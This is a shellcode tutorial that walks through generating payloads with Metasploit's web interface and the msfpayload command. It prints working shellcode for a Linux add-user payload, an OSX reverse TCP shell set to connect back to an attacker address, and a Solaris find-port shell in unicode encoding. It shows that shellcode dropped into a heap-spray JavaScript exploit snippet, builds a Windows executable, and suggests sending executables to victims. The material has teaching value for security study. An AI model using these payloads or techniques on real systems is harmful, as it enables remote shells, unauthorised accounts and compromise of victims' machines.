Shellcode Tutorial 9: Generating Shellcode Using Metasploit


Introduction

Metasploit is an open source exploit framework that provides you with heaps of exploits, as well as tools to assist you in creating your own exploits. This includes the ability to generate a large range of shellcodes for different purposes and platforms that can be customised to attack your target.

This tutorial is an introduction into using the Metasploit Framework to generate shellcode.


Our Aim

Initially we will briefly look at the awesome web interface that Metasploit provides and the easiest way to generate shellcode using Metasploit. Using this interface we will generate the following shellcode:

    - linux/x86/adduser/bind_tcp

The majority of the tutorial will then focus on the command line interface to Metasploit since these will be used in later tutorials. We will use the command line to generate the following shellcode in different formats including raw, unicode, and as a Windows executable:

    - osx/ppc/shell_reverse_tcp
    - solaris/x86/shell_find_port
    - windows/exec

We will also demonstrate how to insert the solaris shellcode into an exploit.

The Metasploit installation process has been added to "Shellcode Tutorial 1: Introduction and Tools Setup".


Metasploit Web Interface (Generating Linux Shellcode)

To access the Metasploit Web Interface, run the following program that will start "msfweb" on http://127.0.0.1:55555:

    - C:\msf3\msfweb.bat

This is demonstrated in the following figure:



To access the shellcode generation feature of the Metasploit Web Interface, click on the "Payloads" button in the top toolbar. You should now be looking at the following screen showing the available payloads that you are able to generate:



We want to use this interface to generate the following shellcode:

    - linux/x86/adduser/bind_tcp

Within the search field type "add user" (without the quotes), and you should be presented with a bunch of payloads that can add a user account to a system. We want to select the "Linux Add User" payload by clicking on the payload title.

This will take you to the screen below that allows you to configure the parameters that you want your payload to execute with, including the username to be created, the corresponding password, and the shell that you want to use for this user.

Some of the more relatively advanced options include any characters that your exploit cannot include, such as a null character since it terminates strings and often prevents your exploit from working. The encoder option allows you to encode your payload so that it adheres to requirements of your exploit, such as having no upper-case letters in case the system you are exploiting converts the payload to lower-case prior to the vulnerability being exploited.

Then lastly is the format option that allows you to format the resulting shellcode for use in different programming languages.

Different payloads will present you with different options within this screen. For example, if you are using a connectback payload then you will need to specify the IP address of the attacker's machine so that the shellcode can connect back to you.

We will use the defaults for this example, as shown below:



If you now hit the generate button, Metasploit will generate the shellcode using the parameters that you specified. This should look similar to the following:



The generated payload is listed below;

    /*
     * linux/x86/adduser - 124 bytes
     * http://www.metasploit.com
     * Encoder: x86/shikata_ga_nai
     * PrependSetresuid=false, PrependSetreuid=false,
     * PrependSetuid=false, AppendExit=false, USER=metasploit,
     * PASS=metasploit, SHELL=/bin/sh
     */
    unsigned char buf[] =
    "\xbf\x8e\x4c\x0d\x9e\x29\xc9\xd9\xec\xb1\x19\xd9\x74\x24\xf4"
    "\x5a\x31\x7a\x11\x03\x7a\x11\x83\xc2\x8a\xae\xf8\xaf\x5b\xa7"
    "\xc8\xba\x1d\xe0\x03\xba\xcb\x15\xc4\x8a\xc2\x47\x9c\x9f\xa7"
    "\x10\x38\x08\x68\xf0\xb0\xa9\x1e\x21\x54\x5e\xbd\xb4\x75\xdf"
    "\xf4\xc3\xb4\x60\x65\x23\x6e\x61\x89\xb4\x02\x04\xfd\xd5\xaf"
    "\xb6\x91\x7a\x39\x43\x53\xc4\xc3\x84\xc7\x8f\x40\xb1\x33\x60"
    "\x93\x0c\x69\xe3\xe1\xbe\xb7\xd3\x2f\x85\xe8\x29\x7f\x9b\x9f"
    "\x23\x50\x28\x37\xb6\xf7\x45\x96\x3a\x6d\x5e\x40\x0e\xf2\x34"
    "\x71\xc8\x3e\x48";

You are then able to copy this shellcode into an exploit for the specified platform. Since the default format was "C" then this would be used in an exploit programmed in C. If we had an exploit written in perl or ruby, etc, then we would generate the shellcode for use in that programming language.

This tutorial will show an example of inserting the generated shellcode into an exploit towards the end.

It should be noted that the web interface of Metasploit may cause some characters to not be present within the generated shellcode causing it to fail. Therefore, the best way to generate shellcode via Metasploit is via the command line using the msfpayload command.


Generating OSX shellcode using the Metasploit "msfpayload" command

Initially we want to launch a bash shell that is provided within the Metasploit installation. This can be done by running the following executable:

    C:\msf3\shell.bat

If you now run "msfpayload" (without any options) it will display all of the different types of shellcode that Metasploit can generate.

The first payload that we want to generate is the OSX PPC Reverse TCP Shell, which is referred to as the following in Metasploit:

    - osx/ppc/shell_reverse_tcp

The following is the format of options that the msfpayload command accepts:

    msfpayload

    Output Types:
    S summary and options of payload
    C C language
    P Perl
    y Ruby
    R Raw, allows payload to be piped into msfencode and other tools
    J JavaScript
    X Windows executable
    V VBA

Based on these options, we now know the payload name that we want, but don't know the variables that we need to set for this payload. This can be enumerated by using the "S" (Summary) option of msfpayload, as shown below:

    $ msfpayload osx/ppc/shell_reverse_tcp S

     Name: OSX Command Shell, Reverse TCP Inline
     Version: 6479
     Platform: ["OSX"]
     Arch: ppc
    Needs Admin: No
     Total size: 164

    Provided by:
     hdm

    Basic options:
    Name Current Setting Required Description
    ---- --------------- -------- -----------
    LHOST yes The local address
    LPORT 4444 yes The local port

    Description:
     Connect back to attacker and spawn a command shell

We can see that we can customise the LHOST and LPORT variables. The next option is the output type. For this example we are going to stick with "C" (C programming language). Therefore, execute the following command to generate our shellcode:

    $ msfpayload osx/ppc/shell_reverse_tcp LHOST=10.1.1.100,LPORT=1337 C

    /*
     * osx/ppc/shell_reverse_tcp - 164 bytes
     * http://www.metasploit.com
     * LHOST=10.1.1.100, LPORT=1337, PrependSetresuid=false,
     * PrependSetreuid=false, PrependSetuid=false, AppendExit=false
     */
    unsigned char buf[] =
    "\x38\x60\x00\x02\x38\x80\x00\x01\x38\xa0\x00\x06\x38\x00\x00"
    "\x61\x44\x00\x00\x02\x7c\x00\x02\x78\x7c\x7e\x1b\x78\x48\x00"
    "\x00\x0d\x00\x02\x05\x39\x0a\x01\x01\x64\x7c\x88\x02\xa6\x38"
    "\xa0\x00\x10\x38\x00\x00\x62\x7f\xc3\xf3\x78\x44\x00\x00\x02"
    "\x7c\x00\x02\x78\x38\xa0\x00\x02\x38\x00\x00\x5a\x7f\xc3\xf3"
    "\x78\x7c\xa4\x2b\x78\x44\x00\x00\x02\x7c\x00\x02\x78\x38\xa5"
    "\xff\xff\x2c\x05\xff\xff\x40\x82\xff\xe5\x38\x00\x00\x42\x44"
    "\x00\x00\x02\x7c\x00\x02\x78\x7c\xa5\x2a\x79\x40\x82\xff\xfd"
    "\x7c\x68\x02\xa6\x38\x63\x00\x20\x90\x61\xff\xf8\x90\xa1\xff"
    "\xfc\x38\x81\xff\xf8\x38\x00\x00\x3b\x7c\x00\x04\xac\x44\x00"
    "\x00\x02\x2f\x62\x69\x6e\x2f\x63\x73\x68\x00\x41\x41\x41";

An example of an exploit that is written in C is the "IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit". You can find this at:

    http://milw0rm.com/exploits/6121
    (Project Shellcode Download: http://www.projectshellcode.com/downloads/milw0rm-6121.c)


Generating Solaris shellcode using the Metasploit "msfpayload" command using JavaScript (Unicode) Encoding.

Generating shellcode via Metasploit is platform independant, so there is no difference in the process detailed above. To prove this we will step through generating the following payload:

    - solaris/x86/shell_find_port

This type of payload is commonly known as "Connection Reuse" or "Find Port" shellcode. This shellcode technique is handy when attempting to exploit a host behind a firewall that has its inbound and outbound rules locked down so that no inbound closed ports or outbound open ports are available. This setup prevents an attacker from using a Port Bind or Connectback payload since they will be blocked by the firewall.

This payload works by the attacker setting the source port of their connection to a predefined value. The shellcode then searches the established connections on the compromised host for one with the hardcoded source port. Once it finds a connection with this source port it reuses the already established connection to point the attacker through to a shell.

The downfall of this type of shellcode is when the firewall is using NAT to the host since the firewall will terminate the attacker's connection at the firewall, and create a new connection from the firewall to the host with a new source port. Similarly if the connection traverses a proxy, a new connection is made between the target and the proxy. When the shellcode searches for the attacker's source port, it won't find it and the shellcode fails. For this reason, Metasploit has a different payload called "find_tag" which places a predefined "tag" on the established connection. This payload searches the established connections for the tag and is able to identify the relevant connection.

So after that little speal, the first thing we want to do is determine the options required for this payload using the following command:

    $ msfpayload solaris/x86/shell_find_port S

     Name: Solaris Command Shell, Find Port Inline
     Version: 6479
     Platform: ["Solaris"]
     Arch: x86
    Needs Admin: No
     Total size: 136

    Provided by:
     Ramon de Carvalho Valle

    Basic options:
    Name Current Setting Required Description
    ---- --------------- -------- -----------
    CPORT 64865 no The local client port

    Description:
     Spawn a shell on an established connection

In this case the only variable used is CPORT, which has a default value. We will specify it anyway on the command line.

These days a lot of client-side vulnerabilities are coming out in software such as Internet Explorer, Adobe Reader, Microsoft Office, etc. Often these vulnerabilities are exploited by injecting the exploit and shellcode into a malicious HTML page. Since most shellcode contains binary data then it can't be inserted directly into a webpage. In this case it needs to be encoded using Unicode Encoding so that it can be placed into a JavaScript function and decoded using the unescape() function. Of course Metasploit provides the JavaScript (or J) option within msfpayload to automatically encode the shellcode with Unicode encoding. This results in the following command:

    $ msfpayload solaris/x86/shell_find_port CPORT=1337 J

    // solaris/x86/shell_find_port - 86 bytes
    // http://www.metasploit.com
    // CPORT=1337, PrependSetreuid=false, PrependSetuid=false,
    // AppendExit=false
    %udb31%ue3f7%u8953%u68e7%ud8ff%u3cff%u656a%ue689%u56f7%uf604
    %u5716%u91b3%u5353%ub754%u5354%u5850%u5040%u366a%uff58%u66d6
    %u7f81%u0502%u7539%u58f0%u6a50%u5009%u3e6a%uff58%uffd6%ue04f
    %uf679%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u8953%u50e1
    %u5351%u3bb0%ud6ff

So as an example, a client-side exploit may contain the following snippet of code where the payload is to be inserted:

    <SCRIPT language="javascript">
        var heapSprayToAddress = 0x05050505;
        var payLoadCode = unescape("insertpayloadhere");
        var heapBlockSize = 0x400000;
        ...

We simply copy our generated shellcode into the "insertpayloadhere" section of the exploit. Often you will find that an exploit will already contain some shellcode, such as a generic portbind payload. Again, you just simply replace it with your own shellcode to customise the exploit to your target environment. The resulting exploit snippet is shown below:

    <SCRIPT language="javascript">
        var heapSprayToAddress = 0x05050505;
        var payLoadCode = unescape("%udb31%ue3f7%u8953%u68e7%ud8ff%u3cff%u656a
        %ue689%u56f7%uf604%u5716%u91b3%u5353%ub754%u5354%u5850%u5040%u366a%uff58
        %u66d6%u7f81%u0502%u7539%u58f0%u6a50%u5009%u3e6a%uff58%uffd6%ue04f%uf679
        %u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u8953%u50e1%u5351%u3bb0%ud6ff");
        var heapBlockSize = 0x400000;
        ...


Generating shellcode as a Windows executable using the Metasploit "msfpayload" command.

Metasploit provides the functionality to output the generated payload as a Windows executable. This is useful for testing that the generated shellcode actually does what you expect, as well as for sending the executable to the victim say via email, HTTP, or even via a "Download and Execute" payload.

A Download and Execute payload is useful when an exploit only has a small buffer where the shellcode can be inserted. This can dramatically restrict which payloads you can use within the exploit. You may be limited to using staged shellcode, where an initial small payload is inserted into the exploit and is designed to then download the larger second stage payload to extend the functionality of the shellcode. Another option is to use a Download and Execute payload where the initial small payload is simply designed to download an executable from the attacker's web server and execute it on the system. This provides a much more feature rich backdoor on the system. The main issue with downloading an executable onto the victim's system is that it is likely to be captured by Anti-Virus - if the victim has it installed.

To demonstrate the Windows executable generation within Metasploit we are going to use the "windows/exec" payload. We therefore initially need to determine the options that we must provide for this payload, as we have done previously using the Summary (S) option:

    $ msfpayload windows/exec S

     Name: Windows Execute Command
     Version: 5773
     Platform: ["Windows"]
     Arch: x86
    Needs Admin: No
     Total size: 113
    
    Provided by:
     vlad902
    
    Basic options:
    Name Current Setting Required Description
    ---- --------------- -------- -----------
    CMD yes The command string to execute
    EXITFUNC thread yes Exit technique: seh, thread, process
    
    Description:
     Execute an arbitrary command

We can see that the only option we need to specify is the "CMD" option. We are simply going to execute "calc.exe" so that we can test it on our own systems. To generate a Windows executable using Metasploit we also need to specify the X output option. This will display the executable to the screen, so we need to pipe it to a file which we will call pscalc.exe, as shown below.

    $ msfpayload windows/exec CMD=calc.exe X > pscalc.exe

    Created by msfpayload (http://www.metasploit.com).
    Payload: windows/exec
     Length: 121
    Options: CMD=calc.exe

You should now have an executable file in the current directory called "pscalc.exe". You can confirm this using the following command:

    $ ls -l pscalc.exe
    -rw-r--r-- 1 Administrator mkpasswd 4637 Oct 9 08:53 pscalc.exe

We can see that this file is not set to be executable, so we need to set the executable permissions on it using the following command:

    $ chmod 755 pscalc.exe

You can now test your shellcode by executing the "pscalc.exe" Windows executable. The following command should trigger the Windows Calculator to be displayed on your system.

    $ ./pscalc.exe

This is demonstrated in the following figure:




Congratulations!

You have just generated four different types of shellcode for four different platforms in different formats using the Metasploit Exploit Framework.